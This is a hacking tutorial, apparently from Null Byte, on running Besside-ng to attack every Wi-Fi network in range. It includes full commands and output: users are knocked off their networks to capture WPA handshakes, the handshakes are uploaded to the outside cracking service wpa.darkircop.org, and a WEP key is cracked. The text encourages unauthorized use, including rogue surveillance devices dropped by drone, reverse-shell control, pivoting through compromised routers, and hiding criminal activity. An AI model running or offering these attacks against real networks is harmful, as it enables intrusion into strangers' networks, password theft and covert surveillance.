Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special dependencies and can be run via SSH, making it easy to deploy remotely.
In my opinion, it's one of the most powerful Wi-Fi hacking tools currently available. First written in 2010 in C, Besside-ng is an incredibly aggressive and persistent WPA handshake mass-harvester and WEP cracker. It features customizable options to upload handshakes to distributed WPA password crackers, which, on average, crack over 18% of networks submitted automatically.
Encrypted Wi-Fi networks come in two primary flavors, WEP and WPA.
While WEP can be broken easily, WPA and WPA2 networks require us to record a "handshake" when a device connects to the target network. Then, we try to guess the password by having a program try many possible passwords against that recorded handshake. If we guess the correct password, we'll know, so having a good password list and a fast processor used to be essential to cracking WPA networks.
In 2020, we have more options. To save time, we can submit these handshakes to a distributed cracking service or a more powerful machine, which will automatically try all of the world's most common and shitty passwords for us. Since many people choose bad passwords, we will get back around 10–20% of our recorded handshakes networks with cracked passwords.
To record a precious handshake from a W-Fi network, an authorized device like the target's smartphone or laptop must connect to the network. Besside-ng scans the airwaves for any devices connected to a Wi-Fi network, then injects a packet that disconnects the device from that network for a brief moment.
The targeted device will reconnect automatically, and we will record the handshake when it does. It's terrifyingly easy, and during peak activity hours in a high-density area, Besside-ng can harvest every Wi-Fi network in use within the range of your antenna. Keep in mind, if your target has an always-connected smart device, you can pretty much always grab a handshake for their network.
Since 2010, some significant changes have made Besside-ng relevant again. Small, cheap computers like the Raspberry Pi Zero W and the Raspberry Pi 3 feature the ability to add powerful network adapters in addition to its internal Wi-Fi card, all while keeping the cost below $70 to run a remote headless attack suite.
So what kind of applications can we use Besside-ng for? Well, lots. But let's just go over a few of the best use-cases quickly so you get an idea.
Cheap, "fire-and-forget" cyberweapons, designed to harvest and crack WPA networks in a given area and then be discarded, are small and light enough to be left in an Altoids tin in the trash, dropped by a small drone on a roof, or tossed over a fence by hand. The same devices can also be used to deliberately jam or attempt to exploit the router of any nearby Wi-Fi network with a bad password.
An attacker would only need a directional antenna (like this one) aimed at the rogue device to communicate with and control it. The rapid way in which Besside-ng builds a list of available Wi-Fi connections to switch between allows a rogue device to develop a "beachhead" into the neighboring wireless environment. This doubles as a list of exploitable routers to pivot through once the WPA password is cracked. Once a rogue device is in place and cracks a few reliable networks, the hacker is free to go home and control the device via a reverse shell.
Emergency set up of workstations when rapidly shifting locations can be aided by using Besside-ng to acquire several connection options in under an hour. A small team needing to rapidly set up an internet-connected forward operating position in an opportunistic workspace (like working out of a garage or public space) can piggyback off existing nearby infrastructure to reduce their footprint.
While it's easy to get access, it is critical to use Tor or VPNs properly, and spin the MAC address of any devices used each time they connect to such a network. If you need a network — any network — to get working, this is your program. This technique can also be used to quickly set up an environment for rogue devices to operate in, allow for a LAN dead drop between two users over a privately owned network, or impersonate users of nearby networks to mask activity.
Setups using kismet drones or other "flytrap-like" methods of electronic surveillance are a great way to avoid having to drop an evil Pi from a drone — or even be anywhere near your target after the initial exploit.
The opportunistic nature of Besside-ng allows it to build up a steady list of routers for a hacker to attempt to exploit. Once a router is successfully compromised, custom router firmware can convert a nearby neighbor's router into a device to spy on a third party's Wi-Fi usage or forward interesting packets. Criminals hackers even leave behind VPN endpoints in exploited routers to provide cover for committing crimes, framing the target, or charging other criminals to use the VPN network.
To show off some of the techniques above, we'll go over an applied scenario of using Besside-ng. However, you can follow along on any Kali Linux device or virtual machine.
Our training mission will be to provide Wi-Fi coverage to support an operation in a targeted building. Doing so allows the placement and operation of a small improvised rogue device called a Buck-Eye, a Kali-based Wi-Fi-connected surveillance camera running on a Raspberry Pi Zero W.
Placing a device like this allows us to do useful things like conduct visual and electronic surveillance of an area, extend VoIP coverage to places where cellular coverage may be blocked, pivot deeper into targeted systems, and perform other helpful functions.
To be controlled, the device must be connected to a Wi-Fi network. After it's placed, you can control it from your long-range connection until you can migrate it to a nearby cracked network. We'll be running Besside-ng via SSH on the Buck-Eye once it is placed to grab a nearby network password.
Since our Buck-Eye runs Kali Linux, Besside-ng can ensure tactical network availability by scanning for and helping to build a list of backdoor Wi-Fi connections to spider through to ensure survivability in the event a primary Wi-Fi connection goes down.
Besside-ng runs on Kali Linux and is particularly effective on the Raspberry Pi 3 or Pi Zero W. You'll need the Aircrack-ng suite to run the attack, and your Kali system should be updated by running apt update.
I'll be using a Raspberry Pi running Kali Linux. But the tool will work on any Kali Linux system — here are a few builds we recommend:
- On a Raspberry Pi 3 running Kali Linux, directly or via SSH.
- On a Raspberry Pi Zero W running Kali Linux.
- On a virtual machine running Kali Linux.
- On a live USB or another temporary install of Kali Linux.
Our Kali Linux build is the easiest way to get started. For hardware, the only real requirement is a wireless network adapter capable of packet injection. (It should be noted that our testing has found bugs when using the Atheros AR9271 chipset.)
In our demonstration, I will be connected to our Raspberry Pi build running Kali Linux via SSH, but this will work the same on any Kali install. First, let's make sure we have the Aircrack-ng suite updated. Type man aircrack-ng to check if it already exists on the system.
~$ man aircrack-ng AIRCRACK-NG(1) General Commands Manual AIRCRACK-NG(1) NAME aircrack-ng - a 802.11 WEP / WPA-PSK key cracker SYNOPSIS aircrack-ng [options] <input file(s)> DESCRIPTION aircrack-ng is an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2 key cracking program. It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite de‐ termines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The main advantage of the PTW approach is that very few data packets are required to crack the WEP key. The second method is the FMS/KoreK method. The FMS/KoreK method incorporates various statistical at‐ tacks to discover the WEP key and uses these in combination with brute forcing. Additionally, the program offers a dictionary method for determin‐ ing the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (file or stdin) or an airolib-ng has to be used. INPUT FILES Capture files (.cap, .pcap), IVS (.ivs) or Hashcat HCCAPX files (.hccapx) OPTIONS Common options: -a <amode> Force the attack mode: 1 or wep for WEP (802.11) and 2 or wpa for WPA/WPA2 PSK (802.11i and 802.11w). -e <essid> Select the target network based on the ESSID. This option is also required for WPA cracking if the SSID is cloaked. For SSID containing special characters, see https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spa‐ ces_double_quote_and_single_quote_etc_in_ap_names -b <bssid> or --bssid <bssid> Select the target network based on the access point MAC ad‐ dress. -p <nbcpu> Set this option to the number of CPUs to use (only avail‐ able on SMP systems) for cracking the key/passphrase. By default, it uses all available CPUs -q If set, no status information is displayed. -C <macs> or --combine <macs> Merges all those APs MAC (separated by a comma) into a vir‐ tual one. -l <file> Write the key into a file. Overwrites the file if it al‐ ready exists. Static WEP cracking options: -c Search alpha-numeric characters only. -t Search binary coded decimal characters only. -h Search the numeric key for Fritz!BOX -d <mask> or --debug <mask> Specify mask of the key. For example: A1:XX:CF -m <maddr> Only keep the IVs coming from packets that match this MAC address. Alternatively, use -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network (this disables ES‐ SID and BSSID filtering). -n <nbits> Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128. -i <index> Only keep the IVs that have this key index (1 to 4). The default behavior is to ignore the key index in the packet, and use the IV regardless. -f <fudge> By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success. -k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. -x or -x0 Disable last keybytes bruteforce (not advised). -x1 Enable last keybyte bruteforcing (default) -x2 Enable last two keybytes bruteforcing. -X Disable bruteforce multithreading (SMP only). -s Shows ASCII version of the key at the right of the screen. -y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs. -z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Wein‐ mann) attack (default attack). -P <num> or --ptw-debug <num> PTW debug: 1 Disable klein, 2 PTW. -K Use KoreK attacks instead of PTW. -D or --wep-decloak WEP decloak mode. -1 or --oneshot Run only 1 try to crack key with PTW. -M <num> -V or --visual-inspection Run in visual inspection mode. Can only be used when using KoreK. WEP and WPA-PSK cracking options -w <words> Path to a dictionary file for wpa cracking. Separate file‐ names with comma when using multiple dictionaries. Specify "-" to use stdin. Here is a list of wordlists: https://www.aircrack- ng.org/doku.php?id=faq#where_can_i_find_good_wordlists In order to use a dictionary with hexadecimal values, prefix the dictionary with "h:". Each byte in each key must be separated by ':'. When using with WEP, key length should be specified using -n. -N <file> or --new-session <file> Create a new cracking session. It allows one to interrupt cracking session and restart at a later time (using -R or --restore-session). Status files are saved every 5 minutes. It does not overwrite existing session file. -R <file> or --restore-session <file> Restore and continue a previously saved cracking session. This parameter is to be used alone, no other parameter should be specified when starting aircrack-ng (all the re‐ quired information is in the session file). WPA-PSK options: -E <file> Create Elcomsoft Wireless Security Auditor (EWSA) Project file v3.02. -j <file> Create Hashcat v3.6+ Capture file (HCCAPX). -J <file> Create Hashcat Capture file (HCCAP). -S WPA cracking speed test. -Z <sec> WPA cracking speed test execution length in seconds. -r <database> Path to the airolib-ng database. Cannot be used with '-w'. SIMD selection: --simd=<option> Aircrack-ng automatically loads and uses the fastest opti‐ mization based on instructions available for your CPU. This options allows one to force another optimization. Choices depend on the CPU and the following are all the possibili‐ ties that may be compiled regardless of the CPU type: generic, sse2, avx, avx2, avx512, neon, asimd, altivec, power8. --simd-list Shows a list of the available SIMD architectures, separated by a space character. Aircrack-ng automatically selects the fastest optimization and thus it is rarely needed to use this option. Use case would be for testing purposes or when a "lower" optimization, such as "generic", is faster than the automatically selected one. Before forcing a SIMD ar‐ chitecture, verify that the instruction is supported by your CPU, using -u. Other options: -H or --help Show help screen -u or --cpu-detect Provide information on the number of CPUs and SIMD support AUTHOR This manual page was written by Adam Cecile <email@example.com> for the Debian system (but may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 2 or any later version published by the Free Software Foundation On Debian sys‐ tems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. SEE ALSO airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8) airodump-ng-oui-update(8) airserv-ng(8) airtun-ng(8) besside-ng(8) easside-ng(8) tkiptun-ng(8) wesside-ng(8) airdecap-ng(1) airdecloak-ng(1) airolib-ng(1) besside-ng-crawler(1) buddy-ng(1) ivstools(1) kstats(1) makeivs-ng(1) packetforge-ng(1) wpaclean(1) airventriloquist(8) Version 1.6.0 January 2020 AIRCRACK-NG(1)
If not, or if we want to make sure it's updated, let's run the following command.
~$ sudo apt install aircrack-ng Reading package lists... Done Building dependency tree Reading state information... Done aircrack-ng is already the newest version (1:1.6-4). aircrack-ng set to manually installed. 0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Once we confirm we have the suite and it's updated, we can proceed with the attack.
On Kali Linux, you can type iwconfig to see a list of available antennas. If you are connecting to your Kali Linux device remotely via SSH or VNC, now is a great time to note which antenna is hosting your data connection (the one with the IP address assigned).
Starting Besside-ng on the wrong antenna will instantly sever your remote connection and lock you out of the device until you restart if you are connected via SSH. Here we see my attack antenna is idle while my command and control antenna is attached to a network.
~$ sudo iwconfig wlan0 IEEE 802.11bgn ESSID:"████████████████████" Mode:Managed Frequency:2.462 GHz Access Point: ████████████████████ Bit Rate=72 Mb/s Tx-Power=1496 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on Link Quality=60/70 Signal level=50 dBm Rx invalid nvid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 lo no wireless extensions. eth0 no wireless extensions. wlan1 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=1496 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
If you are not on Kali, you can run ifconfig to see attached antennas and look for "wlan" to spot the wireless antennas. In this case, wlan1 is my attack antenna.
Besside-ng is dead simple. To learn more about it, visit it's man page.
~$ man besside-ng BESSIDE-NG(8) System Manager's Manual BESSIDE-NG(8) NAME besside-ng - crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics SYNOPSIS besside-ng [options] <interface> DESCRIPTION besside-ng is a tool which will crack all the WEP networks in range and log all the WPA handshakes. WPA handshakes can be up‐ loaded to the online cracking service at wpa.darkircop.org. Wpa.darkircop.com also provides useful statistics based on user- submitted capture files about the feasibility of WPA cracking. -b <target mac> Specifies the target's BSSID -s <WPA server> Where to upload capture file for cracking. A good choice is wpa.darkircop.org -c <chan> Channel lock -p <pps> Packages per second to send (flood rate). -W Crack only WPA networks -v Verbose mode. Use -vv for more verbose, -vv for even more and so on. -h Help screen AUTHOR This manual page was written by David Francos Cuartero. Permis‐ sion is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 2 or any later version published by the Free Software Foundation On De‐ bian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. SEE ALSO airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8) airodump-ng-oui-update(8) airserv-ng(8) airtun-ng(8) easside-ng(8) tkiptun-ng(8) wesside-ng(8) aircrack-ng(1) airdecap-ng(1) airdecloak-ng(1) airolib-ng(1) besside-ng-crawler(1) buddy-ng(1) ivstools(1) kstats(1) makeivs-ng(1) packetforge-ng(1) wpaclean(1) airventriloquist(8) Version 1.6.0 January 2020 BESSIDE-NG(8)
With the attack antenna known as wlan1, simply type the following command to initiate a wide-area attack against all detected APs. While it helps to put an adapter in monitor mode, Besside-ng will take care of that.
~$ sudo besside-ng wlan1 -vv [10:07:47] mac ██:██:██:██:██:██ [10:07:47] Let's ride [10:07:47] Resuming from besside-ng [10:07:47] Found AP ████████████████ [██████] chan 0 crypto WPA dbm 0 [10:07:47] Found AP ████████████████ [████████████████] chan 0 crypto WPA dbm 0 [10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0 [10:07:47] Found AP ████████████████ [████] chan 0 crypto WPA dbm 0 [10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0 [10:07:47] Found AP ████████████████ [██████████████] chan 0 crypto WPA dbm 0 [10:07:47] Appending to wpa.cap [10:07:47] Appemding to wep.cap [10:07:47] Logging to besside.log [10:07:47] Found AP ████████████████ [██████] chan 1 crypto WPA dbm -01 [10:07:47] Found AP ████████████████ [██████] chan 2 crypto WPA dbm -04 [10:07:47] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -06 [10:07:47] Found AP ████████████████ [██████████████████] chan 1 crypto WPA dbm -00 [10:07:48] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -56 [10:07:48] Found AP ████████████████ [██████████] chan 4 crypto WPA dbm -79 [10:07:49] Found AP ████████████████ [████████████] chan 7 crypto WPA dbm -50 [10:07:50] Found AP ████████████████ [████] chan 9 crypto WPA dbm -49 [10:07:50] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -83 [10:07:51] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -72 [10:07:51] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -59 [10:07:52] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -63 [10:07:52] Found AP ████████████████ [████] chan 4 crypto WPA dbm -53 [10:07:53] Found AP ████████████████ [████████████████] chan 6 crypto WPA dbm -65 [10:07:53] Found AP ████████████████ [██████████████████████] chan 7 crypto WPA dbm -66 [10:07:54] - Scanning chan 11
Shit will proceed to hit the fan, with the script automatically throwing the wireless card into monitor mode and scanning all channels for targets. On the first run or two, you may get a "no child process" error. Just run the sudo besside-ng wlan1 command again, and it will start. To see everything the script is doing, add the -vv argument at the end. You'll see the blistering speed at which Besside-ng finds, prioritizes, pings, and attacks networks.
In a target-rich environment, Besside-ng will run continuously for days or weeks, with my current endurance record over one week of continuous attacking. While the attack runs, it will prioritize WEP networks as they can be wholly compromised from within the script. As such, Besside-ng may focus too heavily on WEP and slow down the attack. You can prevent this by only attacking WPA networks by adding the -W argument to the command, as the help page suggests.
~$ sudo besside-ng -h Besside-ng 1.6 - (C) 2010 Andrea Bittau https://www.aircrack-ng.org Usage: besside-ng [options] <interface> Options: -b <victim mac> : Victim BSSID -R <victim ap regex> : Victim ESSID regex -s <WPA server> : Upload wpa.cap for cracking -c <chan> : chanlock -p <pps> : flood rate -W : WPA only -v : verbose, -vv for more, etc. -h : This help screen
This script will, by default, scan all channels, which makes it too slow for wardriving or null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/ to capture handshakes since, by the time the master list of APs to attack is built and prioritized, you're a block away.
This can be mitigated in part by adding the -c argument and followed by a channel number to stay locked on. Doing so builds the target list much more quickly, at the expense of only attacking one channel. Run Airodump-ng to determine the best channels to lock to.
If you wish to attack a particular network, you can add the -b argument followed by the BSSID of the target to specify which access point you want to attack. This is useful for networks with many APs under the same name (extended service sets), which may have many identically named APs that all appear as the same Wi-Fi network. Adding this argument allows you to focus your attack on a particular AP under the umbrella of the network and make faster progress on cracking a WEP key.
Soon, you will begin to gather WPA handshakes, potentially a lot of them. They will be automatically appended to the wpa.cap file, which is created in your home directory if it doesn't already exist. WEP packets are similarly saved to a file called wep.cap, both of which can be run in Aircrack-ng to attempt to get the password.
[10:52:55] Crappy connection - ████████ unreachable got 0/10 (100% loss) [-85 dbm] [10:53:12] Got necessary WFA handshake info for ████████ [10:53:12] Uploaded WPA handshake to wpa.darkircop.org [10:53:12] Pwned network ████████ in 0:07 mins:secs [10:53:12] TO-OWN [████████ ████████████████ ████████ ████ ████████████████████]
We can run these in Aircrack-ng against our own password list, but electricity is expensive, and brute-force attacks are very dull. Instead, we can use the -s argument to specify a WPA server to upload the handshakes. This will let a distributed service like wpa.darkircop.org crack the passwords for us.
If Besside-ng detects a WEP network in range, it will cyberbully the hell out of it. You can open a second terminal window and begin attacking a WEP network while Besside-ng collects unique IVs Aircrack-ng needs to crack the network.
In a terminal, select the network to attack by typing the following. A list of all WEP captures by Besside-ng will be displayed.
~$ sudo aircrack-ng ./wep.cap Opening /Users/████████/web.cap Read 75862 packets. # BSSID ESSID Encryption 1 ████████████████ ████████████████ WEP (28122 IVs) 2 ████████████████ WEP (1012 IVs) 3 ████████████████ WPA (0 handshake) 4 ████████████████ WEP (108 IVs) 5 ████████████████ WEP (4 IVs) 6 ████████████████ WPA (0 handshake) 7 ████████████████ WPA (0 handshake) 8 ████████████████ WEP (7 IVs) 9 ████████████████ WPA (0 handshake) 10 ████████████████ WEP (7 IVs) 11 ████████████████ WPA (0 handshake) 12 ████████████████ WEP (6 IVs) 13 ████████████████ ██████████████ WEP (6 IVs) 14 ████████████████ WEP (13 IVs) 15 ████████████████ ███████████████ WEP (19984 IVs) 16 ████████████████ WEP (22 IVs) 17 ████████████████ ████████████████ WEP (44 IVs) 18 ████████████████ ████████████ WEP (20240 IVs) 19 ████████████████ WEP (12 IVs) 20 ████████████████ ████████ WEP (1 IVs) 21 ████████████████ WEP (1 IVs) 22 ████████████████ ████████ WEP (749 IVs) 23 ████████████████ ████████ WEP (105 IVs) 24 ████████████████ ████████ WEP (1 IVs) 25 ████████████████ ████████████████ WEP (1578 IVs) 26 ████████████████ WEP (9 IVs) 27 ████████████████ ███████████████████ WEP (7 IVs) 28 ████████████████ ██████████████████ WEP (1 IVs) 29 ████████████████ ██████████████ WEP (2 IVs) 30 ████████████████ ████████████████ WEP (3 IVs) 31 ████████████████ ████████ WEP (3052 IVs) 32 ████████████████ ██████ WEP (4 IVs) Index number of target networks ?
Select the number of the network Besside-ng will target, and a beautiful symphony of math ensues as Aircrack-ng attacks the encryption.
Index number of target networks ? 18 Aircrack-ng 1.2 rc4 [00:00:07] Tested 794881 keys (got 25521 IVs) KB depth byte(vote) 0 0/ 1 21(38912) AC(34560) 5B(32768) 1F(31744) C8(31744) 0D(30976) 63(30976) 8C(30976) 82(30720) 09(30464) 69(30464) A0(30464) FC(30464) 1 2/ 3 78(32000) F5(31744) FE(30976) 06(30464) 3E(30464) 9F(30464) AC(30464) C6(30464) D2(30464) 38(30208) 43(30208) 4D(30208) 1C(22952) 2 0/ 1 FB(36352) 33(32768) 0F(32256) 37(31744) 2D(30976) DA(30720) 0D(30208) 61(30208) 9E(30208) AD(30208) C5(30208) F9(30208) 45(29952) 3 1/ 2 4D(34304) A0(32512) 18(31744) 81(30406) C7(30464) F9(30464) 87(30208) 99(30208) A6(30208) D1(30208) F1(30208) 2B(29952) 5B(29952) 4 1/ 2 37(34304) EB(32256) C5(31488) AA(30720) EE(30208) FA(30208) 4A(29952) B3(29952) A7(29696) 61(29440) D0(29184) DB(21184) ED(28928) 5 5/ 6 D4(31488) 8F(30976) EE(30720) 3C(30208) 7D(30208) C4(30208) 77(29952) B8(29952) 5A(29696) B3(29440) 1C(29184) 61(29184) 82(29184) 6 3/ 4 D5(31488) 96(30976) 2B(30208) 90(30208) 6B(30464) AB(30464) CE(30208) F0(30208) FE(30208) 1D(29696) 33(29696) 39(29696) B8(29696) 7 14/ 15 F6(30208) C3(29952) E0(29952) 4A(29696) AF(29696) 32(29440) 50(29440) 31(29184) 7A(29184) B6(29184) BE(29184) EE(29184) 2E(28928) 8 3/ 4 70(30976) 6B(30720) 47(30464) DF(30464) 1F(30208) 32(30208) 7F(30208) 9F(30208) B7(30208) 9C(29696) BF(29696) C3(29696) FF(26969) 9 0/ 1 AB(33536) 1F(31488) 23(31488) C6(31488) 6D(31232) BD(31232) D8(31232) 63(30976) 60(30720) 16(30464) 59(30464) A5(30208) 05(29952) 10 4/ 8 19(31232) 39(30976) E4(30976) FA(30976) 0F(30464) 44(30464) D3(30464) A2(30208) A6(29952) 09(29696) 25(29696) 50(29696) 54(29696) 11 2/ 3 C7(32000) E5(30976) 45(30464) 87(30464) F7(30464) E9(30208) 0B(29952) 41(29952) AD(29952) 31(29696) 42(29696) 9A(29696) D9(29696) 12 1/ 2 37(32256) FD(31744) 8E(31232) E7(30720) FA(30720) 68(30464) D1(30208) 45(29952) 4F(29952) 5D(29952) 65(29952) 09(29696) 39(29696)
Aircrack-ng will re-try the attack automatically every 5,000 IVs as more packets are captured by Besside-ng.
KB depth byte(vote) 0 7/ 8 99(5120) D4(4864) 00(4864) 8B(4864) 07(4864) FB(4864) 11(4864) 03(4608) EC(4608) 17(4608) 18(4608) E6(4608) D9(4608) 1 10/ 14 B2(4864) 6D(4608) 99(4608) 05(4608) A9(4352) 91(4352) 95(4352) B4(4352) 1B(4352) A7(4352) DC(4096) 1D(4096) FC(4096) 2 14/ 15 2D(4608) D6(4352) BD(4352) CF(4352) 0D(4352) 10(4352) 86(4352) B2(4352) B1(4352) FF(4352) 79(4096) D4(4096) 03(4096) 3 15/ 3 07(4352) 4E(4352) DB(4352) 09(4352) 58(4352) 6D(4096) 25(4096) 0F(4096) 44(4096) 8B(4096) 15(4096) 85(4096) EA(4096) 4 17/ 4 95(4352) 72(4352) CC(4352) 55(4352) C2(4096) 19(4096) 2D(4096) 2F(4096) 33(4096) FF(4096) 05(4096) 07(4096) F2(4096) Failed. Next try with 5000 IVs.
This repeats until we defeat the encryption and gain the key.
KB depth byte(vote) 0 0/ 15 21(26112) E1(25600) F9(25088) B9(24832) BA(24576) A2(24320) 19(24320) 10(24064) 63(23808) DA(23552) 8C(23552) BD(23552) ED(23552) 1 11/ 14 BA(24064) 95(23808) 59(23808) 16(23552) 62(23552) 0A(23552) 72(23552) B7(23552) 43(23552) 68(23552) A3(23552) 9D(23552) E5(23296) 2 0/ 3 20(28416) 7A(26624) 91(25856) D4(25344) 2C(25344) DC(25088) 43(25088) 0D(24832) B3(24832) 07(24832) A7(24576) 28(24064) 9A(24064) 3 0/ 1 44(32256) 1C(25856) 82(25600) C0(25088) 2B(24832) 06(24832) 7E(24576) BF(24320) 04(24320) D6(24320) 54(24064) 31(24064) A9(24064) 4 1/ 25 00(25344) 7C(25088) 45(24832) E9(24832) 36(24832) 6C(24576) AF(24320) 25(24064) 17(23808) 3B(23808) 8C(23552) A1(23296) 4F(23296) KEY FOUND! [ ████████████████ ] (ASCII: █████████ ) Decrypted correctly: 100%
Besside-ng experiences two main types of glitches — "no child process" and "network is down." These can be related to your wireless network adapter.
No child process can be fixed by re-running the Besside-ng command, most of the time. Network is down is often caused by the WPA supplicant process throwing your card out of monitor mode. To solve this problem, you can run Airmon-ng:
~$ sudo airmon-ng check kill
This will kill any troublesome processes for monitor mode, but it will also kill any other Wi-Fi interfaces, so be careful if you are SSHed into your device that way.
Besside-ng is not the only tool to target this niche. Suites like Wifite can also be used to attack WPA and WEP networks in automated ways. Wifite includes the added function of attacking WPS setup PINs.
While Wifite certainly provides better situational awareness of wireless targets around you, not everyone has time to wait to hit each network with every attack in the book, as Wifite likes to do. In addition, the WPS setup PIN attack is aging poorly and often no longer works, which wastes a lot of time. These attacks focus on different types of automation, with Wifite throwing everything and the kitchen sink at a particular network or networks, and Besside-ng going ham over any networks that dare exist nearby.
The problem with Wifite is that it sucks because it takes forever, and I rarely have success with it nowadays. By comparison, Besside-ng remains blisteringly fast into the foreseeable future.
While Besside-ng is a phenomenal tool, the nature of the attack means it interacts with every access point in range. This leaves distinctive logs in each router targeted, meaning this attack has the subtlety of running around and smacking every device off of every Wi-Fi connection in range. It can be mitigated by focusing your attack on a particular AP. The technique usually does not disrupt regular network use and operation, but can reveal your device MAC address or physical location if run against a well-defended target.
Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.